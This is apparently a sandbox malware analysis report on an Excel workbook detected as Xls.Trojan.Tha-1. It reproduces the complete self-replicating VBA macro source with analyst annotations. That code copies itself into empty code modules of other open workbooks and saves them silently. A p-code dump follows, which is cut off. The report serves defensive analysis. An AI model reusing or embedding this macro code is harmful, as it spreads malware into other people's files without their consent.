MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
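The file is an Excel spreadsheet containing VBA macros. The macro code, which sits in the Workbook_Deactivate and Worksheet_Deactivate event handlers, attempts to copy itself into the empty code modules of other open workbooks and then saves those workbooks that already exist on disk and had no unsaved changes. This is a common technique for malware to spread or maintain persistence. The replication goes through the VBProject object, which Excel only exposes to macros when "Trust access to the VBA project object model" is enabled. The ClamAV detection 'Xls.Trojan.Tha-1' further supports its malicious nature. No specific IOCs like URLs or file paths were directly extracted from the macro code; the indicators this report does provide are the ClamAV signature name and the SHA-256 of the extracted macro source.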
Heuristics 2
-
ClamAV: Xls.Trojan.Tha-1 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Xls.Trojan.Tha-1
-
VBA macros detected | medium | OLE_VBA_MACROS | Document contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10446 bytes |

SHA-256: b8ea3830b3d9c16ea9b685221529ed31dfd817c67c3c2bae560a7c76dbbbc62f
Detection
ClamAV: Xls.Trojan.Tha-1
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "DieseArbeitsmappe"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Deactivate()
' Analyst annotation (defensive reading of the sample; code lines are unchanged).
' Event handler that fires when the host workbook is deactivated. It copies the
' macro source into empty code modules of the workbooks in Application.Workbooks,
' which is the self-replication behaviour behind the ClamAV detection.
' Every step goes through VBProject, so it depends on Excel's "Trust access to
' the VBA project object model" setting. No On Error handler is present, so a
' denied access ends the Sub with a run-time error rather than failing silently.
' Only ThaClass is typed As String; OurCode is an implicit Variant, and the
' inner loop variable j is never declared.
Dim OurCode, ThaClass As String
Dim i As Integer
Dim Saved As Boolean
' Name compared against each target component below. It matches the VB_Name of
' this sample's workbook module (the name German-language Excel gives it).
ThaClass = "DieseArbeitsmappe"
' Reads the complete text (line 1 through CountOfLines) of component 1 of the
' workbook that is running this code; this text is what gets copied.
OurCode = Application.ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule.Lines(1, Application.ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
' Outer loop: every workbook currently open in this Excel instance.
For i = 1 To Application.Workbooks.Count
' Per-workbook flag; set below when the workbook should be written back to disk.
Saved = False
' Inner loop: every VBA component (workbook module, sheets, other modules).
For j = 1 To Application.Workbooks.Item(i).VBProject.VBComponents.Count
' Only modules with zero lines are modified, so modules that already hold code
' (including ones filled by an earlier run) are skipped.
If Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines = 0 Then
' Flag for saving only if the workbook already has a path on disk and had no
' unsaved changes before the insertion below.
If Application.Workbooks.Item(i).Path <> "" And Application.Workbooks.Item(i).Saved = True And Saved = False Then Saved = True
' Places the copied source at the top of the empty module.
Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.InsertLines 1, OurCode
' Rewrites line 1 so the handler name fits the host component: a component named
' ThaClass gets Workbook_Deactivate, any other component gets Worksheet_Deactivate.
If Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).Name = ThaClass Then
Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.ReplaceLine 1, "Private Sub Workbook_Deactivate()"
Else
Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.ReplaceLine 1, "Private Sub Worksheet_Deactivate()"
End If
End If
Next j
' Writes the modified workbook back to disk; no prompt or confirmation is coded here.
If Saved = True Then Application.Workbooks.Item(i).Save
Next i
End Sub
Attribute VB_Name = "Tabelle1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_Deactivate()
' Analyst annotation (defensive reading of the sample; code lines are unchanged).
' Worksheet-level copy of the replication routine: it fires when the host sheet
' is deactivated, and its body is line-for-line the same as the
' Workbook_Deactivate handler in this sample's workbook module.
' It reads and writes other workbooks' code through VBProject, which Excel only
' permits when "Trust access to the VBA project object model" is enabled. No
' On Error handler is present, so a denied access raises a run-time error.
' Only ThaClass is typed As String; OurCode is an implicit Variant, and the
' inner loop variable j is never declared.
Dim OurCode, ThaClass As String
Dim i As Integer
Dim Saved As Boolean
' Component name used below to choose which handler header a target module gets.
ThaClass = "DieseArbeitsmappe"
' The copied text is always taken from component 1 of the running workbook
' (lines 1 through CountOfLines), not from this sheet module itself.
OurCode = Application.ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule.Lines(1, Application.ThisWorkbook.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
' Outer loop: every workbook currently open in this Excel instance.
For i = 1 To Application.Workbooks.Count
' Per-workbook flag; set below when the workbook should be written back to disk.
Saved = False
' Inner loop: every VBA component of that workbook.
For j = 1 To Application.Workbooks.Item(i).VBProject.VBComponents.Count
' Targets only modules that contain no code at all.
If Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.CountOfLines = 0 Then
' Flag for saving only when the workbook has a path on disk and was unmodified
' before the insertion below.
If Application.Workbooks.Item(i).Path <> "" And Application.Workbooks.Item(i).Saved = True And Saved = False Then Saved = True
' Inserts the copied source at line 1 of the empty module.
Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.InsertLines 1, OurCode
' Replaces line 1 with the handler header matching the component: a component
' named ThaClass gets Workbook_Deactivate, anything else Worksheet_Deactivate.
If Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).Name = ThaClass Then
Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.ReplaceLine 1, "Private Sub Workbook_Deactivate()"
Else
Application.Workbooks.Item(i).VBProject.VBComponents.Item(j).CodeModule.ReplaceLine 1, "Private Sub Worksheet_Deactivate()"
End If
End If
Next j
' Saves the modified workbook to disk; no prompt or confirmation is coded here.
If Saved = True Then Application.Workbooks.Item(i).Save
Next i
End Sub
' Processing file: /opt/analyzer/scan_staging/19123c0f9c2b4575accd6b0fb9b788b7.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/DieseArbeitsmappe - 8856 bytes
' Line #0:
' FuncDefn (Private Sub Workbook_Deactivate())
' Line #1:
' Line #2:
' Dim
' VarDefn ThisWorkbook
' VarDefn id_0292 (As String)
' Line #3:
' Dim
' VarDefn _B_var_For (As Integer)
' Line #4:
' Dim
' VarDefn Saved (As Boolean)
' Line #5:
' Line #6:
' LitStr 0x0011 "DieseArbeitsmappe"
' St id_0292
' Line #7:
' Line #8:
' LitDI2 0x0001
' LitDI2 0x0001
' Ld Application
' MemLd Lines
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd i
' MemLd _B_var_If
' LitDI2 0x0001
' Ld Application
' MemLd Lines
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd i
' ArgsMemLd CountOfLines 0x0002
' S
... (truncated)
|
|||